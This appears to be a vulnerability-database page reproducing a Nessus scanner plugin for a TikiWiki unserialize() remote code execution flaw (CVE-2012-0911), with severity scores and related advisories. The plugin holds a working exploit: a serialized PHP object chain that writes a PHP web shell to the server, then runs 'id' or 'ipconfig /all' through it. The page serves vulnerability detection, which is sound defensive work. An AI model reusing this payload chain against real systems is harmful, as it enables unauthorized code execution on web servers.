Lucene search
This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.TIKIWIKI_UNSERIALIZE_CODE_EXECUTION.NASLHistoryAug 30, 2012 - 12:00 a.m.
TikiWiki unserialize() Function Arbitrary Code Execution
2012-08-3000:00:00
This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
27
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.947 High
EPSS
Percentile
99.3%
The version of the TikiWiki installed on the remote host contains a flaw that could allow a remote attacker to execute arbitrary code. The โunserialize()โ function is not properly sanitized before being used in the โlib/banners/bannerlib.phpโ, โtiki-print_multi_pages.phpโ, โtiki-send_objects.phpโ and โtiki-print_pages.phpโ scripts.
Successful exploitation of the vulnerability requires that the โmultiprintโ feature is enabled, the PHP setting โdisplay_errorsโ must be set to โOnโ, and a PHP version older than 5.3.4 must be in use to allow poison NULL bytes in filesystem-related functions.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(61733);
script_version("1.16");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2012-0911");
script_bugtraq_id(54298);
script_xref(name:"EDB-ID", value:"19573");
script_name(english:"TikiWiki unserialize() Function Arbitrary Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that allows arbitrary code
execution.");
script_set_attribute(attribute:"description", value:
"The version of the TikiWiki installed on the remote host contains a
flaw that could allow a remote attacker to execute arbitrary code. The
'unserialize()' function is not properly sanitized before being used in
the 'lib/banners/bannerlib.php', 'tiki-print_multi_pages.php',
'tiki-send_objects.php' and 'tiki-print_pages.php' scripts.
Successful exploitation of the vulnerability requires that the
'multiprint' feature is enabled, the PHP setting 'display_errors' must
be set to 'On', and a PHP version older than 5.3.4 must be in use to
allow poison NULL bytes in filesystem-related functions.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2012/Jul/19");
script_set_attribute(attribute:"see_also", value:"https://tiki.org/article191-Tiki-Releases-8-4");
script_set_attribute(attribute:"solution", value:
"Upgrade to version 8.4 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"Tiki Wiki CMS Groupware 8.3 RCE");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Tiki Wiki unserialize() PHP Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2012/08/04");
script_set_attribute(attribute:"patch_publication_date", value:"2012/05/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/08/30");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:tikiwiki:tikiwiki");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("tikiwiki_detect.nasl", "os_fingerprint.nasl");
script_require_keys("www/tikiwiki", "www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("data_protection.inc");
port = get_http_port(default:80, php:TRUE);
install = get_install_from_kb(
appname : "tikiwiki",
port : port,
exit_on_fail : TRUE
);
dir = install["dir"];
install_url = build_url(qs:dir+'/', port:port);
# Get full path for use in our exploit POST request
url = dir + '/tiki-rss_error.php';
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);
get_path = eregmatch(pattern:"[> ](([a-zA-Z]:\\|\/).*)tiki-rss_error\.php", string:res[2], icase:TRUE);
if (isnull(get_path)) exit(0, "The full path for the TikiWiki install at "+install_url+" could not be determined.");
install_path = get_path[1];
# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ("Windows" >< os) cmd = 'ipconfig /all';
else cmd = 'id';
cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');
cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";
token = (SCRIPT_NAME - ".nasl") + "-" + unixtime() + ".php";
foreach cmd (cmds)
{
# Get path to the file uploaded for use in our reporting section
if (cmd == 'id') upload_path = "system('pwd')";
else upload_path = "system('dir "+ token +"')";
# Form our PHP file to upload
php_shell = "<?php+echo('<pre>');+system('"+ cmd +"');+echo(' - "+token+" ');+"+upload_path+";?>";
shell_length = strlen(php_shell);
path = install_path + token + "%00";
path_length = strlen(path) - 2;
printpages = 'O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:' +
'{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:' +
'{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:' +
'{s:11:\"%00*%00_dirPath\";s:' + path_length +':"'+path+'";}' +
's:10:\"%00*%00_fields\";a:1:' +
'{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:' +
'{s:4:\"name\";s:'+shell_length+':"'+php_shell+'";}}' +
's:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}';
printpages = urlencode(
str : printpages,
unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~'-+$",
case_type : HEX_UPPERCASE
);
# Send POST request to upload the PHP file
res2 = http_send_recv3(
port : port,
method : "POST",
item : dir + '/tiki-print_multi_pages.php',
data : 'printpages=' + printpages,
add_headers : make_array("Content-Type","application/x-www-form-urlencoded"),
exit_on_fail : TRUE
);
if ('Required features: <b>feature_wiki_multiprint</b>' >< res2[2])
exit(0, "The Multiprint feature appears to be disabled for the TikiWiki install at "+install_url+".");
exp_request = http_last_sent_request();
# Try accessing the file we uploaded
url3 = dir + "/" + token;
res3 = http_send_recv3(method:"GET", item:url3, port:port, exit_on_fail:TRUE);
if (egrep(pattern:cmd_pats[cmd], string:res3[2]))
{
# Remove NULL byte and format the output
if (cmd == 'id')
{
out_full = strstr(res3[2], "uid");
pos = stridx(out_full, " - " + token);
output = substr(out_full, 0, pos);
form_up_path = strstr(res3[2], "php");
form_up_path2 = stridx(form_up_path, '\n');
form_up_path3 = substr(form_up_path, 0, form_up_path2) - "php ";
get_up_path = chomp(form_up_path3) + "/" + token;
}
else
{
out_full = strstr(res3[2], "Windows IP Configuration");
pos = stridx(out_full, " - " + token);
output = substr(out_full, 0, pos);
form_up_path = strstr(res3[2],"Directory of");
form_up_path2 = stridx(form_up_path, '\n');
form_up_path3 = substr(form_up_path, 0, form_up_path2) - "Directory of ";
get_up_path = chomp(form_up_path3) + "\" + token;
}
if (report_verbosity > 0)
{
snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
report =
'\nNessus was able to verify the issue exists using the following request :' +
'\n' +
'\n' + build_url(qs:url3, port:port) +
'\n' +
'\nNote: This file has not been removed by Nessus and will need to be' +
'\nmanually deleted (' + get_up_path + ').' +
'\n';
if (report_verbosity > 1)
{
report +=
'\nThis file was uploaded using the following request :' +
'\n' +
'\n' + snip +
'\n' + exp_request +
'\n' + snip +
'\n' +
'\n' + 'The file uploaded by Nessus executed the command : '+ cmd +
'\nwhich produced the following output :' +
'\n' +
'\n' + snip +
'\n' + data_protection::sanitize_uid(output:chomp(output)) +
'\n' + snip +
'\n';
}
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, "TikiWiki", install_url);
Related
packetstorm
packetstorm
Tiki Wiki <= 8.3 unserialize() PHP Code Execution
2012-07-06 00:00:00
Tiki Wiki CMS Groupware 8.3 Code Execution
2012-07-04 00:00:00
nvd
nvd
CVE-2012-0911
2012-07-12 19:55:03
seebug
seebug
Tiki Wiki CMS Groupware 'unserialize()' PHPไปฃ็ ๆง่กๆผๆด
2012-07-06 00:00:00
Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution
2014-07-01 00:00:00
openvas
openvas
exploitpack
exploitpack
Tiki Wiki CMS Groupware 8.3 - Unserialize() PHP Code Execution
2012-07-04 00:00:00
prion
prion
Code injection
2012-07-12 19:55:00
dsquare
dsquare
Tiki Wiki CMS Groupware 8.3 RCE
2012-08-10 00:00:00
cvelist
cvelist
CVE-2012-0911
2012-07-12 19:00:00
cve
cve
CVE-2012-0911
2012-07-12 19:55:03
checkpoint_advisories
checkpoint_advisories
Tiki Wiki PHP unserialize() Remote Code Execution (CVE-2012-0911)
2013-09-22 00:00:00
exploitdb
exploitdb
Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution
2012-07-04 00:00:00
securityvulns
securityvulns
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.947 High
EPSS
Percentile
99.3%
Related for TIKIWIKI_UNSERIALIZE_CODE_EXECUTION.NASL